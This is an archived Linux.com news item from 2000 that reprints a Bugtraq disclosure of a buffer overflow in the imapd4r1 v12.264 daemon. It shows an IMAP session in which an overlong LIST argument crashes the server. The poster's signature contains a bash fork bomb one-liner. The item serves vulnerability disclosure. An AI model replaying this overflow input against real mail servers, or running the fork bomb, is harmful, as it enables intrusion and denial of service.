Lc.DB — the Linux.com Article Museum
Home:: Authors:: Categories:: Staff:: All Articles Powered by GNU/Linux
Originally published: Monday, 17 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1   [Standard view]

imapd4r1 v12.264 exploit

The imap daemon shipped with the newest redhat has a security hole, which allows the intruder to get shell access to the mail account.
From: Michal Zalewski Subject: imapd4r1 v12.264 To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready 1 login lcamtuf test 1 OK LOGIN completed 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]=20 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

*sigh*

Privledges seems to be dropped, but, anyway, it's nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need code security audit.

_______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=3D--=3D> bash$ :(){ :|:&};: =3D-----=3D> God is real, unless declared integer. <=3D-----=3D

Originally published on Linux.com. Released under the Open Content License unless otherwise stated. Notify Gareth Watts of any errors or copyright violations.